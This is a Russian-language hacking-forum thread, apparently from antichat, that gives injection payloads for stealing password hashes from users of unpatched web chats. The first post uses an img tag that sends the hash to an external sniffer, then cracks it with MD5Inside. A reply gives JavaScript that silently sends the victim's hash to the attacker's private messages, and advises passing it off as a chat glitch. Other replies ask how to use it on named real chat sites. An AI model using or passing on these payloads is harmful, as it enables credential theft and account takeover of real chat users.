Работает во всех непропатченых чатах.
Много тут статей о том , как достать хеши пользователей...
Имхо.. , самый простой способ.
Все те же \x3c \x3e.
Создаем ссылку на а-чатовский сниффер,
\x3cimg src="http\x3a//old.antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
Кидаем ее в общак и бежим смотреть логи.
Там получается чтот вроде *
REFERER=http://-----PWD_Hash=2fdd85f2e81f897493942071267c94ad&First=1
То, что нам нужно , стоит после PWD_Hash=..... и до
&First=1.
Копиреум , и скармливаем проге MD5Inside.
Очень много вариантов , куда этот шеш можно деть-)
З.Ы. Ники на русском переводятся в цыферки и проценты , обратный ход можно получить с помощью яндеса, вставля их в запрос)

З.Ы.2 Первая статья. Сторого не судите.

непонял что куда копировать?

как это всё применить на http://citychat.spb.ru/ подскажите

ну или этот http://chat.xuk.ru/index.php

А так непроще чтоб никуда небегать)

/TO ЖЕРТВА \x3cimg src=javascript:window.parent.window.input.document .MsgForm.M.value="/TO%20TROJAN%20"+window.parent.window.input.document.MsgForm.PWD_H ash.value;window.parent.window.input.document.MsgF orm.submit() name="imaga"\x3e


Логично жертва логин кому отправляем, TROJAN наш логин)
Ну и в результате в приват к нам придёт хеш) (единсвенный минус енто жертва видит его, НО многие просто спрашивают "Что енто??" :confused: " ну и ответьте глюки чата, не просвещённый непоймёт что от него отправилось!)